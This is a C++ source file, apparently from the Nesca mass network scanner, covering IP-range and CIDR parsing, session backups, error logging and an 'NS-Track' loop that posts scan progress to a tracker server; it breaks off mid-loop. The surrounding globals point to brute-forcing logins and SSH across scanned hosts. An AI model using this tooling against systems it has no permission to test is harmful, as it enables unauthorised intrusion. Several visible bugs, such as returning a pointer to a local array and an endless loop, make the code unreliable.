#include "STh.h" #include "mainResources.h" #include "externData.h" #include "externFunctions.h" #include "Connector.h" #include "Threader.h" #include "FileUpdater.h" #include QJsonArray *jsonArr = new QJsonArray(); bool gShuffle = true; bool __savingBackUpFile = false; bool horLineFlag = false; static int portArr[65536] = { 0 }; int gThreadDelay = 10; int gC = 0; int gTimeOut = 3; int PieAnomC1 = 0, PieBA = 0, PieSusp = 0, PieLowl = 0, PieWF = 0, PieSSH = 0; int AnomC1 = 0, Filt = 0, Overl = 0, Lowl = 0, Alive = 0, saved = 0, Susp = 0, WF = 0, offlines = 0, ssh = 0; int GlobalNegativeSize = 0; int ipCounter = 0; int found = 0, indexIP = 0; int gMode; int MaxPass = 0, MaxLogin = 0, MaxTags = 0, MaxWFLogin = 0, MaxWFPass = 0, MaxSSHPass = 0; int ipsstart[4], ipsend[4], overallPorts, flCounter, octet[4]; int baCount = 0; int gPingTimeout = 1; int gMaxBrutingThreads = 50; unsigned int Activity = 0; unsigned char **ipsstartfl = NULL, **ipsendfl = NULL, **starterIP = NULL; double ips = 0; char **GlobalNegatives = 0; char **loginLst, **passLst; char **wfLoginLst, **wfPassLst; char **sshlpLst; char saveEndIP[128] = { 0 }; char gRange[128] = { 0 }; char gTLD[128] = { 0 }; char gPorts[65536] = { 0 }; char metaRange[256] = { 0 }; char metaPercent[256] = { 0 }; char metaIPS[256] = { 0 }; char metaTargets[256] = { 0 }; char metaETA[256] = { 0 }; char metaOffline[256] = { 0 }; char currentIP[MAX_ADDR_LEN] = { 0 }; char currentMask[128] = { 0 }; char finalIP[32] = { 0 }; bool ErrLogFirstTime = true; bool gPingNScan = false; long long unsigned int gTargets = 0, gTargetsOverall = 1, targets; volatile int gThreads; volatile int cons = 0; volatile int BrutingThrds = 0; volatile int threads = 20; unsigned char tl(unsigned char d) { if (d >= 192 && d <= 223) { return (unsigned char)(d + 32); } else { return tolower(d); }; } std::string toLowerStr(const char *str) { if (str != NULL) { int tsz = strlen(str); char *strr = new char[tsz + 1]; ZeroMemory(strr, tsz); for (int i = 0; i < tsz; i++) { strr[i] = tl(str[i]); }; memset(strr + tsz, '\0', 1); std::string tstr = std::string(strr); delete[]strr; return tstr; } else return ""; } void SaveErrorLog(char *sender, char *MesSent, char *ReplRecv) { FILE *errFile = fopen("./logs/ns-track_errors.html", "r"); if (errFile != NULL) { fclose(errFile); }; #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) CreateDirectory(L"./logs", NULL); #else struct stat st = {0}; if (stat("./logs", &st) == -1) { mkdir("./logs", 0700); } #endif time_t rtime; time(&rtime); char cdate[32] = { 0 }; strcpy(cdate, ctime(&rtime)); char *totalErrLog = NULL; char stylePart[] = { "" }; char firstPart[] = { "
" }; char secondPart[] = { "
Message sent:
" };
	char thirdPart[] = { "
Reply received:
" }; int sz = strlen(stylePart) + strlen(firstPart) + strlen(secondPart) + strlen(thirdPart) + strlen(forthPart) + strlen(QByteArray(MesSent).replace("\r\n", "\n").data()) + (strlen(ReplRecv) + 50 * strlen(ReplRecv) / 100) + strlen(cdate) + strlen(sender); totalErrLog = new char[sz + 4]; ZeroMemory(totalErrLog, sz); if (ErrLogFirstTime) strcat(totalErrLog, stylePart); strcat(totalErrLog, firstPart); strcat(totalErrLog, sender); strcat(totalErrLog, " - "); strcat(totalErrLog, cdate); strcat(totalErrLog, secondPart); strcat(totalErrLog, QByteArray(MesSent).replace("\r\n", "\n").data()); strcat(totalErrLog, thirdPart); strcat(totalErrLog, base64_encode((const unsigned char *)ReplRecv, strlen(ReplRecv)).c_str()); strcat(totalErrLog, forthPart); memset(totalErrLog + sz, '\0', 1); errFile = fopen("./logs/ns-track_errors.html", "a"); if (errFile != NULL) { fwrite(totalErrLog, sz, 1, errFile); fclose(errFile); } else { stt->doEmitionRedFoundData("[Log] -Cant open log file!"); }; if (totalErrLog != NULL) { delete[]totalErrLog; totalErrLog = NULL; }; } QString GetNSErrorDefinition(const char *str, const char *elem) { const char *temp = strstr(str, elem); if (temp != NULL) { char definition[128] = { 0 }; const char *firstComma = strstr(temp + strlen(elem) + 1, "\""); const char *lastComma = strstr(firstComma + 1, "\""); int sz = lastComma - firstComma - 1; strncpy(definition, firstComma + 1, (sz < 128 ? sz : 128)); return QString(definition); } else return QString("No definition found!"); } void _SaveBackupToFile() { char saveStr[512] = { 0 }; char saveBuffer[4096] = { 0 }; char endStr[128] = { 0 }; if (gMode == 0 || gMode == 1) { if (gMode == 1) { if (strlen(currentMask) == 0) { sprintf(endStr, "%s", currentIP); } else strcpy(endStr, currentMask); } else { sprintf(endStr, "%s-%s", currentIP, finalIP); }; if (strlen(endStr) > 0) { sprintf(saveStr, "[SESSION]:%d %s %s %d %s\n", gMode, endStr, gTLD, gThreads, gPorts); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); }; } else if (gMode == -1) { char ipRange[128] = { 0 }; if (flCounter > 0) { FILE *savingFile = fopen("tempIPLst.bk", "w"); if (savingFile != NULL) { sprintf(ipRange, "%s-%d.%d.%d.%d\n", currentIP, ipsendfl[gC][0], ipsendfl[gC][1], ipsendfl[gC][2], ipsendfl[gC][3]); fputs(ipRange, savingFile); ZeroMemory(ipRange, sizeof(ipRange)); for (int tCounter = gC + 1; tCounter < flCounter; ++tCounter) { sprintf(ipRange, "%d.%d.%d.%d-%d.%d.%d.%d\n", ipsstartfl[tCounter][0], ipsstartfl[tCounter][1], ipsstartfl[tCounter][2], ipsstartfl[tCounter][3], ipsendfl[tCounter][0], ipsendfl[tCounter][1], ipsendfl[tCounter][2], ipsendfl[tCounter][3]); fputs(ipRange, savingFile); ZeroMemory(ipRange, sizeof(ipRange)); }; fclose(savingFile); } else stt->doEmitionRedFoundData("[_saver] Cannot open file."); }; sprintf(saveStr, "[SESSION]:%d RESTORE_IMPORT_SESSION %d %s\n", gMode, gThreads, gPorts); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); }; sprintf(saveStr, "[NDBSERVER]:%s\n", trcSrv); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[NDBSCRIPT]:%s\n", trcScr); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[NDBPORT]:%s\n", trcSrvPortLine); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[PROXY]:%s\n", trcProxy); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[PROXYPORT]:%s\n", trcPort); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[PING]:%s\n", gPingNScan ? "true" : "false"); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[SHUFFLE]:%s\n", gShuffle ? "true" : "false"); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[NSTRACK]:%s\n", trackerOK ? "true" : "false"); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[PING_TO]: %d\n", gPingTimeout); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[THREAD_DELAY]: %d\n", gThreadDelay); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[TIMEOUT]: %d\n", gTimeOut); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[MAXBTHR]: %d\n", gMaxBrutingThreads); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[SYSTEMPROXYIP]: %s\n", gProxyIP); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); sprintf(saveStr, "[SYSTEMPROXYPORT]: %s\n", gProxyPort); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); strcpy(saveStr, "[PERSKEY]:"); strncat(saveStr, trcPersKey, 32); strcat(saveStr, "\n"); strcat(saveBuffer, saveStr); ZeroMemory(saveStr, sizeof(saveStr)); FILE *savingFile = fopen("restore", "w"); if (savingFile != NULL) { fputs(saveBuffer, savingFile); fclose(savingFile); } else stt->doEmitionRedFoundData("[_saver] Cannot open file."); ZeroMemory(saveStr, strlen(saveStr)); ZeroMemory(saveBuffer, strlen(saveBuffer)); } void _saver() { Sleep(1000); while (globalScanFlag) { __savingBackUpFile = true; _SaveBackupToFile(); __savingBackUpFile = false; Sleep(10000); }; } void _timer() { char dbuffer[32] = { 0 }, timeLeft[64] = { 0 }, b[32] = { 0 }; int ticks = 0; int ovrlIPs = 0; ips = 1; Sleep(50); while (globalScanFlag) { ++ticks; ovrlIPs += ipCounter; ipCounter = 0; ips = ovrlIPs / ticks; strncpy(b, QString::number(ips).toLocal8Bit().data(), 5); strcpy(metaIPS, b); //strcat(timeLeft, b); //strcat(timeLeft, "/s ("); //if (ips > 0) //{ // strncpy(dbuffer, std::to_string(((gTargets + 1) / ips / 3600 / 24)).c_str(), 5); //} //else strcpy(dbuffer, "INF"); //strcpy(metaETA, dbuffer); //strcat(dbuffer, "d)"); //strcat(timeLeft, (strcmp(dbuffer, "1.$d)") == 0 ? "INF)" : dbuffer)); //ZeroMemory(timeLeft, sizeof(timeLeft)); //ZeroMemory(dbuffer, sizeof(dbuffer)); Sleep(1000); }; } void _tracker() { while (true) { while (globalScanFlag && !trackerOK) Sleep(1000); if (!globalScanFlag && jsonArr->size() == 0) break; char rBuffT[250000] = { 0 }; char *msg = new char[4096]; ZeroMemory(msg, sizeof(*msg)); char ndbServer[64] = { 0 }; char ndbScriptT[64] = { 0 }; char ndbScript[64] = { 0 }; sockaddr_in sockAddr; sockAddr.sin_family = AF_INET; sockAddr.sin_port = htons(atoi(trcSrvPortLine)); strcpy(msg, "GET /"); strcat(msg, trcScr); strcat(msg, " HTTP/1.1\r\nHost: "); strcat(msg, trcSrv); strcat(msg, "\r\nX-Nescav3: True\r\nContent-Type: application/x-www-form-urlencoded\r\nConnection: close\r\n\r\n"); HOSTENT *host; #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) if (inet_addr(trcSrv) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(trcSrv); else if (host = gethostbyname(trcSrv)) ((unsigned long*)&sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; #else if(inet_addr(trcSrv) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(trcSrv); else if(host=gethostbyname (trcSrv)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; #endif SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)) == -1) { CSSOCKET(sock); stt->doEmitionRedFoundData("[NS-Track] -Cannot connect to balancer! " + QString::number(WSAGetLastError()) + "."); continue; }; if (send(sock, msg, strlen(msg), 0) == -1) { CSSOCKET(sock); stt->doEmitionRedFoundData("[NS-Track] -Cannot send to balancer! " + QString::number(WSAGetLastError()) + "."); continue; }; ZeroMemory(rBuffT, sizeof(rBuffT)); char rBuff[512] = { 0 }; int test = recv(sock, rBuff, sizeof(rBuff), 0); strcpy(rBuffT, rBuff); while ((test = recv(sock, rBuff, sizeof(rBuff), 0)) != 0) { if (strlen(rBuffT) > 200000) { stt->doEmitionRedFoundData("[NS-Track] (Outer) -Large error received from server (>200000b) " + QString::number(WSAGetLastError()) + "."); SaveErrorLog("NS-Track", msg, rBuffT); break; }; strcat(rBuffT, rBuff); }; if (test == -1) { CSSOCKET(sock); stt->doEmitionRedFoundData("[NS-Track] -Cannot recv from balancer! " + QString::number(WSAGetLastError()) + "."); continue; }; char *t1; char *t2; if (strstr(rBuffT, "http://") != NULL) { t1 = strstr(rBuffT, "http://"); if (strstr((char*)(t1 + 7), "/") != NULL) { t2 = strstr((char*)(t1 + 7), "/"); int ln = t2 - t1 - 7; if (ln > 64) { CSSOCKET(sock); stt->doEmitionRedFoundData("[NS-Track] -Received server string is not valid!"); SaveErrorLog("NS-Track", msg, rBuffT); continue; } else strncpy(ndbServer, (char*)(t1 + 7), ln); if (strlen(t2) > 64) { stt->doEmitionYellowFoundData("[NS-Track] -Fragmentation detected!"); if (strstr(t2, "\r\n") != NULL) { char *t3 = strstr(t2, "\r\n"); int y = (int)(t3 - t2); if (y > 64) { CSSOCKET(sock); stt->doEmitionRedFoundData("[NS-Track] -Received server string is not valid!"); SaveErrorLog("NS-Track", msg, rBuffT); continue; } else { strncpy(ndbScriptT, t2, y); CSSOCKET(sock); stt->doEmitionGreenFoundData("[NS-Track] -OK! -Fragmented server string aquired! Starting NS-Track loop..."); strncpy(ndbScript, ndbScriptT, strlen(ndbScriptT)); }; } else { CSSOCKET(sock); stt->doEmitionRedFoundData("[NS-Track] -Received server string is not valid!"); SaveErrorLog("NS-Track", msg, rBuffT); continue; }; } else { strcpy(ndbScriptT, t2); stt->doEmitionGreenFoundData("[NS-Track] -OK! -Server string aquired! Starting NS-Track loop..."); CSSOCKET(sock); strncpy(ndbScript, ndbScriptT, strlen(ndbScriptT) - 2); }; } else { CSSOCKET(sock); stt->doEmitionRedFoundData("[NS-Track] -Cannot receive script value!"); continue; }; ZeroMemory(rBuffT, sizeof(rBuffT)); CSSOCKET(sock); while (true) { if (!globalScanFlag && jsonArr->size() == 0) break; if (!trackerOK) { Sleep(1000); continue; }; if (jsonArr->size() > 0) { QJsonObject jsonKey; if (jsonArr == NULL) jsonArr = new QJsonArray(); QJsonObject jsonMeta; if (gMode == 0) jsonMeta.insert("mode", QJsonValue(QString("IP"))); // else if (gMode == 1) jsonMeta.insert("mode", QJsonValue(QString("DNS"))); //Mode else if (gMode == -1) jsonMeta.insert("mode", QJsonValue(QString("Import"))); // jsonMeta.insert("range", QJsonValue(QString(metaRange))); jsonMeta.insert("current", QJsonValue(QString(currentIP))); if (gMode == 1) jsonMeta.insert("tld", QJsonValue(QString(gTLD))); //TLD jsonMeta.insert("targets", QJsonValue(QString(metaTargets))); jsonMeta.insert("percent", QJsonValue(QString(metaPercent))); jsonMeta.insert("saved", QJsonValue(QString::number(saved))); jsonMeta.insert("found", QJsonValue(QString::number(found))); jsonMeta.insert("speed", QJsonValue(QString(metaIPS))); jsonMeta.insert("eta", QJsonValue(QString(metaETA))); jsonMeta.insert("threads", QJsonValue(QString::number(cons) + "/" + QString::number(gThreads))); jsonMeta.insert("bads", QJsonValue(QString::number(offlines))); jsonMeta.insert("version", QJsonValue(QString(gVER))); jsonArr->push_front(QJsonValue(jsonMeta)); memset(trcPersKey + 32, '\0', 1); jsonKey.insert("key", QJsonValue(QString(trcPersKey))); jsonArr->push_front(jsonKey); QJsonDocument js; js.setArray(*jsonArr); QByteArray r = js.toJson(); sockAddr.sin_family = AF_INET; sockAddr.sin_port = htons(atoi(trcSrvPortLine)); if (msg != NULL) { delete[]msg; msg = 0; }; msg = new char[r.size() + 1024]; ZeroMemory(msg, sizeof(*msg)); strcpy(msg, "POST /"); strcat(msg, ndbScript); strcat(msg, " HTTP/1.1\r\nHost: "); strcat(msg, ndbServer); strcat(msg, "\r\nContent-Type: application/json\r\nAccept-Encoding: application/json\r\nContent-Length: "); strcat(msg, std::to_string(r.size()).c_str()); strcat(msg, "\r\nConnection: close\r\n\r\n"); strcat(msg, r.data()); delete jsonArr; jsonArr = new QJsonArray(); #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) if (inet_addr(ndbServer) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ndbServer); else if (host = gethostbyname(ndbServer)) ((unsigned long*)&sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; #else if(inet_addr(ndbServer) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ndbServer); else if(host=gethostbyname (ndbServer)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0]; #endif sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (gDebugMode) { stt->doEmitionDebugFoundData("Connecting to " + QString(ndbServer)); }; if (connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr)) == -1) { CSSOCKET(sock); stt->doEmitionRedFoundData("[NS-Track] -connect() returned " + QString::number(WSAGetLastError()) + "."); continue; }; if (gDebugMode) { stt->doEmitionDebugFoundData("Sending!"); stt->doEmitionDebugFoundData("Key: [" + QString(trcPersKey) + "]"); stt->doEmitionDebugFoundData("MSG: [" + QString(msg) + "]"); }; if (send(sock, msg, strlen(msg), 0) == -1) { CSSOCKET(sock); stt->doEmitionRedFoundData("[NS-Track] -send() returned " + QString::number(WSAGetLastError()) + "."); SaveErrorLog("NS-Track", msg, ""); continue; }; ZeroMemory(rBuffT, sizeof(rBuffT)); char msgR[32] = { 0 }; if (gDebugMode) { stt->doEmitionDebugFoundData("Receiving..."); }; test = recv(sock, rBuff, 512, 0); if (gDebugMode) { stt->doEmitionDebugFoundData("Received: " + QString(rBuff)); }; strncpy(msgR, rBuff, 32); strcpy(rBuffT, rBuff); while (test > 0) { if (test <= 0) break; if (strlen(rBuffT) > 200000) { stt->doEmitionRedFoundData("[NS-Track] (Inner) -Large error received from server (>200000b) " + QString::number(WSAGetLastError()) + "."); SaveErrorLog("NS-Track", msg, rBuffT); break; }; strcat(rBuffT, rBuff); test = recv(sock, rBuff, 512, 0); if (gDebugMode) { stt->doEmitionDebugFoundData("Received: " + QString(rBuff)); }; }; if (test == -1) { CSSOCKET(sock); stt->doEmitionRedFoundData("[NS-Track] -recv() returned " + QString::number(WSAGetLastError()) + "."); SaveErrorLog("NS-Track", msg, ""); continue; }; if (strstr(rBuffT, "201 Created") != NULL) { if (gDebugMode) stt->doEmitionYellowFoundData("[NS-Track] -OK. Data saved!"); stt->doEmitionDataSaved(true); Sleep(1000); stt->doEmitionDataSaved(false); } else if (strstr(rBuffT, "400 Bad Request") != NULL) { QString errorDef = GetNSErrorDefinition(rBuffT, "notify"); if (errorDef == "Invalid access key") stt->doEmitionYellowFoundData("[NS-Track] [Key is unauthorized] A valid key is required."); else stt->doEmitionYellowFoundData("[NS-Track] -FAIL! [400 Bad Request : " + errorDef + "]"); SaveErrorLog("NS-Track", msg, rBuffT); } else { stt->doEmitionYellowFoundData("[NS-Track] -FAIL! An error occured [" + QString(msgR) + "]"); SaveErrorLog("NS-Track", msg, rBuffT); }; ZeroMemory(msgR, sizeof(msgR)); ZeroMemory(rBuffT, sizeof(rBuffT)); ZeroMemory(msg, sizeof(*msg)); if (msg != NULL) { delete msg; msg = NULL; }; CSSOCKET(sock); }; Sleep(10000); }; } else { stt->doEmitionRedFoundData("[NS-Track] -Balancer replied with invalid string."); SaveErrorLog("NS-Track", msg, rBuffT); }; CSSOCKET(sock); } } unsigned long int numOfIps(int ipsstart[], int ipsend[]) { gTargets += 16777216 * (ipsend[0] - ipsstart[0]); gTargets += 65536 * (ipsend[1] - ipsstart[1]); gTargets += 256 * (ipsend[2] - ipsstart[2]); gTargets += (ipsend[3] - ipsstart[3]); gTargetsOverall = gTargets + 1; //unsigned long ip1 = (ipsstart[0] * 16777216) + (ipsstart[1] * 65536) + (ipsstart[2] * 256) + ipsstart[3]; //unsigned long ip2 = (ipsend[0] * 16777216) + (ipsend[1] * 65536) + (ipsend[2] * 256) + ipsend[3]; //unsigned long gTargets = ip2 - ip1; return gTargets; } void verboseProgress(unsigned long target) { stt->doEmitionUpdateArc(gTargets); if(gTargets > 0) --gTargets; char targetNPers[128] = { 0 }; float percent = (gTargetsOverall != 0 ? (100 - target / (double)gTargetsOverall * 100) : 0); sprintf(targetNPers, "%Lu (%.1f%%)", target, percent); sprintf(metaTargets, "%Lu", target); sprintf(metaPercent, "%.1f", percent); } #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) unsigned char* ASCIItoUNICODE(unsigned char ch) { unsigned char Val[2]; if ((ch < 192) && (ch != 168) && (ch != 184)) { Val[0] = 0; Val[1] = ch; return Val; } if (ch == 168) { Val[0] = 208; Val[1] = 129; return Val; } if (ch == 184) { Val[0] = 209; Val[1] = 145; return Val; } if (ch < 240) { Val[0] = 208; Val[1] = ch - 48; return Val; } if (ch < 249) { Val[0] = 209; Val[1] = ch - 112; return Val; } } #endif std::string xcode(LPCSTR src, UINT srcCodePage, UINT dstCodePage) { std::string res; #if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__) int wsize = MultiByteToWideChar(srcCodePage, 0, src, -1, 0, 0); LPWSTR wbuf = (LPWSTR)new char[wsize * sizeof(WCHAR)]; MultiByteToWideChar(srcCodePage, 0, src, -1, wbuf, wsize); int size = WideCharToMultiByte(dstCodePage, 0, wbuf, -1, 0, 0, 0, 0); char * buf = (char *)new char[size]; WideCharToMultiByte(dstCodePage, 0, wbuf, -1, buf, size, 0, 0); delete wbuf; res.append(buf); delete buf; #else unsigned int size = 0; while (src[size++]!=0); char * buf = (char *)new char[size]; unsigned char uni[16] = {0}; size=0; while (src[size]!=0) { }; delete buf; #endif return res; } void CheckMaskBits(char *res, int index) { char *bitsStr = strstr(res, "/"); int bitsNum = atoi(bitsStr + 1); int finalBit = 1; int bitCounter = 0; if (bitsNum <= 32 && bitsNum > 24) //4 octet { bitCounter = 32 - bitsNum; for (int i = 0; i < bitCounter; i++) finalBit *= 2; ipsstartfl[index][0] = ipsendfl[index][0] = octet[0]; ipsstartfl[index][1] = ipsendfl[index][1] = octet[1]; ipsstartfl[index][2] = ipsendfl[index][2] = octet[2]; ipsstartfl[index][3] = octet[3]; ipsendfl[index][3] = octet[3] + finalBit - 1; } else if (bitsNum <= 24 && bitsNum > 16) //3 octet { bitCounter = 24 - bitsNum; for (int i = 0; i < bitCounter; i++) finalBit *= 2; ipsstartfl[index][0] = ipsendfl[index][0] = octet[0]; ipsstartfl[index][1] = ipsendfl[index][1] = octet[1]; ipsstartfl[index][2] = octet[2]; ipsendfl[index][2] = octet[2] + finalBit - 1; ipsstartfl[index][3] = octet[3]; ipsendfl[index][3] = 255; } else if (bitsNum <= 16 && bitsNum > 8) //2 octet { bitCounter = 16 - bitsNum; for (int i = 0; i < bitCounter; i++) finalBit *= 2; ipsstartfl[index][0] = ipsendfl[index][0] = octet[0]; ipsstartfl[index][1] = octet[1]; ipsendfl[index][1] = octet[1] + finalBit - 1; ipsstartfl[index][2] = octet[2]; ipsendfl[index][2] = 255; ipsstartfl[index][3] = octet[3]; ipsendfl[index][3] = 255; } else if (bitsNum <= 8 && bitsNum > 0) //1 octet { bitCounter = 8 - bitsNum; for (int i = 0; i < bitCounter; i++) finalBit *= 2; ipsstartfl[index][0] = octet[0]; ipsendfl[index][0] = octet[0] + finalBit - 1; ipsstartfl[index][1] = octet[1]; ipsendfl[index][1] = 255; ipsstartfl[index][2] = octet[2]; ipsendfl[index][2] = 255; ipsstartfl[index][3] = octet[3]; ipsendfl[index][3] = 255; } else { stt->doEmitionRedFoundData("[CheckMaskBits] Cannot parse IP list"); stt->doEmitionKillSttThread(); }; } void GetOctets(char *curIP) { char *str1; char *str2; char temp[8] = { 0 }; if (strstr(curIP, ".") != NULL) { str1 = strstr(curIP, "."); //1 strncpy(temp, curIP, str1 - curIP); octet[0] = atoi(temp); ZeroMemory(temp, sizeof(temp)); } else { str1 = strstr(curIP, "/"); strncpy(temp, curIP, str1 - curIP); octet[0] = atoi(temp); octet[1] = 0; octet[2] = 0; octet[3] = 0; return; }; if (strstr(str1 + 1, ".") != NULL) { str2 = strstr(str1 + 1, "."); //2 strncpy(temp, str1 + 1, str2 - str1); octet[1] = atoi(temp); ZeroMemory(temp, sizeof(temp)); } else { str2 = strstr(str1 + 1, "/"); strncpy(temp, str1 + 1, str2 - str1); octet[1] = atoi(temp); octet[2] = 0; octet[3] = 0; return; }; if (strstr(str2 + 1, ".") != NULL) { str1 = strstr(str2 + 1, "."); //3 strncpy(temp, str2 + 1, str1 - str2); octet[2] = atoi(temp); ZeroMemory(temp, sizeof(temp)); } else { str1 = strstr(str2 + 1, "/"); strncpy(temp, str2 + 1, str1 - str2); octet[2] = atoi(temp); octet[3] = 0; return; }; if (strstr(str1 + 1, ".") != NULL) { str2 = strstr(str1 + 1, "."); //4 strncpy(temp, str1 + 1, str2 - str1); octet[3] = atoi(temp); ZeroMemory(temp, sizeof(temp)); } else { str2 = strstr(str1 + 1, "/"); strncpy(temp, str1 + 1, str2 - str1 - 1); octet[3] = atoi(temp); return; }; } void FileLoader(char *str) { char curIP[256] = { 0 }, curIPCopy[256] = { 0 }; unsigned int importFileSize = 0; FILE *fl = fopen(str, "r"); if (fl != NULL) { while (fgets((char*)curIP, sizeof(curIP), fl) != NULL) { if (curIP[0] != '#' && curIP[0] != ' ' && curIP[0] != '\n' && curIP[0] != '\r' && strcmp(curIP, "") != 0 && ((curIP[0] == '/' && curIP[1] == '/') == false) && ((curIP[0] == '\t' && curIP[1] == '\t' && curIP[2] == '\t' && (curIP[3] == 13 || curIP[3] == 10 || curIP[3] == '#')) == false) && (curIP[0] == '\t' && curIP[1] == '\t' && curIP[2] == '\t' && (curIP[3] == '/' && curIP[4] == '/')) == false) { ++importFileSize; }; ZeroMemory(curIP, sizeof(curIP)); }; ipsstartfl = new unsigned char*[importFileSize + 2]; ipsendfl = new unsigned char*[importFileSize + 2]; starterIP = new unsigned char*[importFileSize + 2]; ZeroMemory(ipsstartfl, importFileSize); ZeroMemory(ipsendfl, importFileSize); ZeroMemory(starterIP, importFileSize); for (int i = 0; i < importFileSize; ++i) { ipsstartfl[i] = new unsigned char[4]; ipsendfl[i] = new unsigned char[4]; starterIP[i] = new unsigned char[4]; ZeroMemory(ipsstartfl[i], 4); ZeroMemory(ipsendfl[i], 4); ZeroMemory(starterIP[i], 4); }; rewind(fl); while (fgets(curIP, 256, fl) != NULL) { if (curIP[0] != '#' && curIP[0] != ' ' && curIP[0] != '\n' && curIP[0] != '\r' && strcmp(curIP, "") != 0 && ((curIP[0] == '/' && curIP[1] == '/') == false) && ((curIP[0] == '\t' && curIP[1] == '\t' && curIP[2] == '\t' && (curIP[3] == 13 || curIP[3] == 10 || curIP[3] == '#')) == false) && (curIP[0] == '\t' && curIP[1] == '\t' && curIP[2] == '\t' && (curIP[3] == '/' && curIP[4] == '/')) == false) { strcpy(curIPCopy, curIP); char *ptr1 = strstr(curIP, " "); if (ptr1 != NULL) curIP[(int)(ptr1 - curIP)] = '\0'; ptr1 = strstr(curIP, " "); if (ptr1 != NULL) curIP[(int)(ptr1 - curIP) - 1] = '\0'; ptr1 = strstr(curIP, "#"); if (ptr1 != NULL) curIP[(int)(ptr1 - curIP) - 1] = '\0'; if (strcmp(curIP, "") == 0 || strcmp(curIP, " ") == 0 || strcmp(curIP, "\r\n") == 0 || strcmp(curIP, "\n") == 0 || curIP[0] == ' ' || curIP[0] == '#') { ZeroMemory(curIPCopy, sizeof(curIPCopy)); ZeroMemory(curIP, sizeof(curIP)); continue; }; if (strstr(curIP, "-") != NULL) { bool firstPart = true; int offset = 0; int curNIndex = 0; char curS; char curN[32] = { 0 }; for (int i = 0; i < strlen(curIP); ++i) { curS = curIP[i]; if (curS == '.') { if (firstPart) { starterIP[flCounter][offset] = atoi(curN); ipsstartfl[flCounter][offset] = atoi(curN); } else ipsendfl[flCounter][offset] = atoi(curN); ++offset; curNIndex = 0; ZeroMemory(curN, 32); continue; } else if (curS == '-') { if (firstPart) { starterIP[flCounter][offset] = atoi(curN); ipsstartfl[flCounter][offset] = atoi(curN); } else ipsendfl[flCounter][offset] = atoi(curN); offset = 0; firstPart = false; curNIndex = 0; ZeroMemory(curN, 32); continue; }; curN[curNIndex++] = curS; if (i == strlen(curIP) - 1) { ipsendfl[flCounter][offset] = atoi(curN); }; }; if (ipsstartfl[flCounter][0] > ipsendfl[flCounter][0] || (ipsstartfl[flCounter][0] >= ipsendfl[flCounter][0] && ipsstartfl[flCounter][1] > ipsendfl[flCounter][1] ) || (ipsstartfl[flCounter][0] >= ipsendfl[flCounter][0] && ipsstartfl[flCounter][1] >= ipsendfl[flCounter][1] && ipsstartfl[flCounter][2] > ipsendfl[flCounter][2] ) || (ipsstartfl[flCounter][0] >= ipsendfl[flCounter][0] && ipsstartfl[flCounter][1] >= ipsendfl[flCounter][1] && ipsstartfl[flCounter][2] >= ipsendfl[flCounter][2] && ipsstartfl[flCounter][3] > ipsendfl[flCounter][3] ) ) { char tempMsg[256] = { 0 }; strcpy(tempMsg, "[IP Loader]Wrong list format. Line-> ["); strcat(tempMsg, std::to_string(flCounter).c_str()); strcat(tempMsg, "] String-> ["); strcat(tempMsg, curIPCopy); strcat(tempMsg, "]"); stt->doEmitionRedFoundData(QString(tempMsg)); return; }; gTargets += 256 * 256 * 256 * (ipsendfl[flCounter][0] - ipsstartfl[flCounter][0]); gTargets += 256 * 256 * (ipsendfl[flCounter][1] - ipsstartfl[flCounter][1]); gTargets += 256 * (ipsendfl[flCounter][2] - ipsstartfl[flCounter][2]); gTargets += (ipsendfl[flCounter][3] - ipsstartfl[flCounter][3]); ++flCounter; } else if (strstr(curIP, "/") != NULL) { int mask = 0; char *ptr1 = strstr(curIP, "/"); GetOctets(curIP); mask = atoi(ptr1 + 1); unsigned char mOctet[4]; mOctet[0] = 1; mOctet[1] = 1; mOctet[2] = 1; mOctet[3] = 1; if (mask >= 24) { mOctet[0] = 255; mOctet[1] = 255; mOctet[2] = 255; for (int i = 0; i < mask - 24 - 1; 